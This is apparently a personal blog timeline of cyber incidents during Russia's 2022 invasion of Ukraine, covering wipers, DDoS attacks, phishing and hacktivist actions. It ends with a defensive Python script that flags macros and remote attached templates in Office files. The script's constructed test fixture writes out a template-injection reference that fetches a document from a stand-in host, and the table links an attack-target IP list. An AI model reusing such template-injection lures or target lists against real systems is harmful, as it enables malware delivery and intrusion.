“Disinformation, false flags, DDoS attacks, and destructive wiper malware are a part of Russian military doctrine.”
Rick Holland, Digital Shadows CISO, 2022
A timeline of cyber incidents in the build-up to, and during, the Russian invasion of Ukraine, kept so I can track and stay on top of events. Dates of gathered intel are in AEDT (UTC+11).
I’ve decided to extend this list to include all cyber activity. I’ll be focusing on additional data from 26 Feb onwards.
Will continue to update with new information.
Date (AEDT) | Target Country | Sector | Organisation | Description | Group | Sources |
---|---|---|---|---|---|---|
13 Jan | Ukraine* | Govt, Private, Infrastructure** | Multiple government and non-profit organisations; IT firm Kitsoft | Destructive malware (WhisperGate) disguised as ransomware, used to destroy files: it overwrites the MBR and corrupts files rather than encrypting them for payment. Data exfiltration, credentials and shell access to certain government sites observed in dark web posts offering these assets for sale. | DEV-0586 | Microsoft Security Week |
14 Jan | Ukraine | Govt | Ministry of Foreign Affairs, Ministry of Education and Science, ~70 sites | Website defacements, reportedly via an OctoberCMS vulnerability (CVE-2021-32648) | DEV-0586 | The Guardian |
19 Jan | Ukraine | Govt | Undisclosed | Malware testing and reuse of historical techniques involving VNC-based remote access tooling | Gamaredon | Palo Alto |
19 Jan | Canada | Govt | Global Affairs Canada | Unknown incident, investigation ongoing. Non-critical internet and internet-based services taken down as a mitigation. | Not known | CBC |
15 Feb | Ukraine | Govt, Finance | Ministry of Defence, PrivatBank, Oschadbank, Diya portal | DDoS lasting ~2 hours | Russian Main Intelligence Directorate (GRU), as attributed by the UK and US governments | NPR, NSDC Ukraine |
15 Feb | Ukraine | Civilians | Civilians | Fake text messages sent to civilians claiming ATMs had gone offline (debunked), resulting in panic withdrawals | Not known | Twitter, NPR |
18 Feb | Ukraine | Govt, Infrastructure | Strategic enterprises, security and defence bodies | Multiple large-scale DDoS attacks, ongoing | Traffic from Russian networks | NSDC Ukraine |
24 Feb | Ukraine | Govt, Finance | Multiple websites: Defence and Foreign ministries, Council of Ministers, PrivatBank, State Savings Bank (Oschadbank) and other banks | DDoS; destructive wiper malware (HermeticWiper, first reported 23 Feb) | Multiple | |
24 Feb | – | Private | Flightradar24 | DDoS disrupting a service used to track potential military aircraft | Not known | ZDNet |
24 Feb | Donetsk, Ukraine | Private | Denis Pushilin (head of the self-declared DPR) | DDoS on his personal website | Not known | TASS |
24 Feb | Ukraine | Govt | System of Electronic Interaction of Executive Bodies (SEI EB) | Mass contamination of public authorities' information resources: documents uploaded to the portal contain malicious scripts that download malware, triggered mainly when the user clicks “Enable Editing” in Office applications. | Gamaredon | NSDC Ukraine |
25 Feb | Russia | Govt | mil.ru | DDoS on site; credential leak | GhostSec | Treadstone 71 |
25 Feb 6pm | Russia | Govt | kremlin.ru, duma.gov.ru, mil.ru | Self-imposed geofencing from 6pm (GMT+2), potentially to mitigate DDoS | – | |
25 Feb | Russia | Finance | Sberbank, Alfabank | DDoS lasting 2 hours | Not known | Twitter*** |
25 Feb | Russia | Govt, Media | rt.com, kremlin.ru, en.fas.gov.ru, lenta.ru | DDoS | Anonymous | Twitter |
25 Feb | Crimea, Ukraine | Govt | IT infrastructure | DDoS at 8:28pm (GMT+2) | Not known | Interfax |
25 Feb | European cluster | Private | Multiple Telegram channels | Telegram infrastructure overloaded, causing intermittent short-term outages. Multiple channels saw a spike in subscribers, notably floods of bot accounts (bot attacks). E.g. the political gossip channel Nezygar.Brief removed its short link to stop further flooding and avoid a ban under Telegram policy. | – | Pavel Durov (Telegram) |
26 Feb | – | Gang | Conti | Conti releases a statement announcing full support for the Russian government | Conti | |
26 Feb | Russia | Finance | Sberbank, VTB Bank | DDoS | – | |
26 Feb | Russia | Infrastructure | Russian Railways, Roscosmos | DDoS | – | Telegram |
26 Feb | Ukraine | Military | Armed Forces personnel | Spearphishing campaign targeting the personal email accounts of armed forces personnel, primarily on i.ua and meta.ua | UNC1151 | Bleeping Computer |
26 Feb | Russia | Infrastructure | Multiple sites | Anonymous announces it will target various infrastructure, databases, web servers and networks (see https://anonfiles.com/tfn6obK8x3/RussiaC2Ips_rtf) | Anonymous, GhostSec | |
28 Feb | Russia | Gang | Conti | A Ukrainian Conti member reportedly hacked the gang's internal Jabber/XMPP server and leaked its chat logs (ContiLeaks) | Conti | |
* The attack appears targeted: it hit a contractor with offices in Latvia and another contractor in Lithuania.
** Ukraine’s Ministry of Foreign Affairs reports that more than 100 of the world’s Fortune 500 companies rely at least partially on Ukrainian IT services, with several Ukrainian IT firms being among the top 100 outsourcing options for IT services globally.
*** Flagging this event as Unverified as there is only one source and Twitter is being used as a platform for disinformation.
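The 24 Feb SEI EB entry above describes the classic lure: an Office document that only does harm once the reader clicks through the yellow bar. The two most common ways such a document stages its payload are an embedded VBA project (fires on "Enable Content") and a remote attached template (fetched as soon as the document leaves Protected View, i.e. on "Enable Editing"). The triage script below is an added example written for this post, not tooling from NSDC Ukraine or any of the cited sources, and the mechanism it checks for is an assumption about these lures, not something the NSDC notice spells out. It unpacks an OOXML file, flags a `vbaProject.bin` part, and walks every `.rels` part for external targets that are not ordinary hyperlinks. The three sample documents it builds in memory (including the 203.0.113.10 TEST-NET address) are constructed for the example.

```python
"""Triage an Office Open XML (.docx/.dotm) file for the two common ways a
"click Enable Editing" lure stages a payload: an embedded VBA project and a
remote attached template. Example code written for this post; not from any
cited source. Sample documents below are constructed, not real samples.
"""
import io
import re
import zipfile
from dataclasses import dataclass, field

# Relationship type Word uses for an attached template (word/_rels/settings.xml.rels).
ATTACHED_TEMPLATE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                     "relationships/attachedTemplate")
REL_RE = re.compile(r"<Relationship\b([^>]*)/?>", re.IGNORECASE)
ATTR_RE = re.compile(r'(\w+)="([^"]*)"')


@dataclass
class Finding:
    has_vba: bool = False                                   # vbaProject.bin present
    remote_templates: list = field(default_factory=list)    # attachedTemplate targets
    external_rels: list = field(default_factory=list)       # (rels part, target)

    @property
    def suspicious(self) -> bool:
        return self.has_vba or bool(self.remote_templates) or bool(self.external_rels)


def triage_ooxml(data: bytes) -> Finding:
    """Inspect the zip container; never lets Office parse anything."""
    f = Finding()
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        names = z.namelist()
        f.has_vba = any(n.lower().endswith("vbaproject.bin") for n in names)
        for n in names:
            if not n.lower().endswith(".rels"):
                continue
            xml = z.read(n).decode("utf-8", "replace")
            for m in REL_RE.finditer(xml):
                attrs = dict(ATTR_RE.findall(m.group(1)))
                if attrs.get("TargetMode", "").lower() != "external":
                    continue  # internal part reference, normal
                rel_type = attrs.get("Type", "")
                target = attrs.get("Target", "")
                if rel_type == ATTACHED_TEMPLATE:
                    f.remote_templates.append(target)   # template injection
                elif rel_type.endswith("/hyperlink"):
                    continue  # clickable links are external by design; ignore
                elif re.match(r"(?i)https?://|\\\\", target):
                    f.external_rels.append((n, target))  # other network fetch (e.g. OLE)
    return f


# ---- constructed sample documents (minimal zip containers, not real malware) ----
HYPERLINK = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink"
MINIMAL = {
    "[Content_Types].xml": "<Types/>",
    "word/document.xml": "<w:document/>",
    "word/_rels/document.xml.rels":
        '<Relationships><Relationship Id="rId1" Type="%s" '
        'Target="https://example.com/" TargetMode="External"/></Relationships>' % HYPERLINK,
}


def _build_docx(parts: dict) -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        for name, body in parts.items():
            z.writestr(name, body)
    return buf.getvalue()


def benign_sample() -> bytes:
    return _build_docx(MINIMAL)


def remote_template_sample() -> bytes:
    parts = dict(MINIMAL)
    parts["word/_rels/settings.xml.rels"] = (
        '<Relationships><Relationship Id="rId1" Type="%s" '
        'Target="http://203.0.113.10/tpl.dotm" TargetMode="External"/></Relationships>'
        % ATTACHED_TEMPLATE)
    return _build_docx(parts)


def macro_sample() -> bytes:
    parts = dict(MINIMAL)
    parts["word/vbaProject.bin"] = b"\xd0\xcf\x11\xe0 stub OLE header"  # placeholder bytes
    return _build_docx(parts)


if __name__ == "__main__":
    for label, doc in (("benign", benign_sample()),
                       ("remote-template", remote_template_sample()),
                       ("macro", macro_sample())):
        print(label, triage_ooxml(doc))
```

Run it against a directory of uploaded attachments and quarantine anything `suspicious`; a hit on `remote_templates` is the case that matters for the "Enable Editing" wording in the NSDC notice, because no macro prompt ever appears before the template is fetched.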
All facts and links in this post are represented as accurately as possible given the volatility and influx of information. If there are discrepancies, please contact me and I will update accordingly. All views and opinions expressed are my own.